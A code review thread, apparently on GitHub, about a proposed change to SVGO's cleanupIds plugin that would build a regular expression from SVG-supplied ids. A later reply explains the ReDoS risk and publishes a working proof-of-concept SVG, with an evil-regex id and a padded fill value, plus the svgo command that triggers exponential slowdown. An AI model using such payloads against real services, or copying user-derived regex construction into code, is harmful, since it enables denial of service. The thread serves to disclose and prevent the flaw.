plugins/cleanupIds.js

```diff
@@ -233,7 +233,7 @@ export const fn = (_root, params) => {
                 if (value.includes('#')) {
                   // replace id in href and url()
                   element.attributes[name] = value.replace(
-                    `#${encodeURI(id)}`,
+                    new RegExp(`#(${id}|${encodeURI(id)})`),
                     `#${currentIdString}`,
                   );
```

Comment:
Something like this would be better:

```js
                  element.attributes[name] = value
                    .replace(`#${encodeURI(id)}`, `#${currentIdString}`)
                    .replace(`#${id}`, `#${currentIdString}`);
```

The proposed version opens us up to a potential ReDoS, as a user provides the SVG which we'd derive both the regex and value. A malicious user could upload a vulnerable SVG to a server that uses SVGO to abuse this.

Let's keep things simple and just chain two replaces. 👍🏽

Reply:
Thank you for your review. It was indeed an oversight on my part, and I have already submitted the fix to the current PR.

Reply:
Thanks for addressing this.

Just leaving more context here, as I received an email asking about this vulnerability, and as it was never merged, I see no issue with demonstrating how to abuse it publically for anyone interested.

**pwned.svg**
```svg
<svg xmlns="http://www.w3.org/2000/svg">
  <defs>
    <linearGradient id="(#+)+$" x1="0%" y1="0%" x2="100%" y2="0%">
      <stop offset="10%" stop-color="#c71700" />
    </linearGradient>
  </defs>
  <rect x="30" y="30" height="150" width="370" fill="############################X url('#(#+)+$')" />
</svg>
```

Then one way or another, a computer attempts to optimize this SVG. In CLI this would be with:

```sh
svgo pwned.svg -o out.svg
```

It would identify an element with an ID of `(#+)+$`, an evil regex, then match it to the value of `############################X url('#(#+)+$')` further down, with each additional `#` doubling the time it takes to process the SVG.

The above took 15 seconds on my computer (16 threads), so with just 7 more `#` symbols would take it to an hour to process.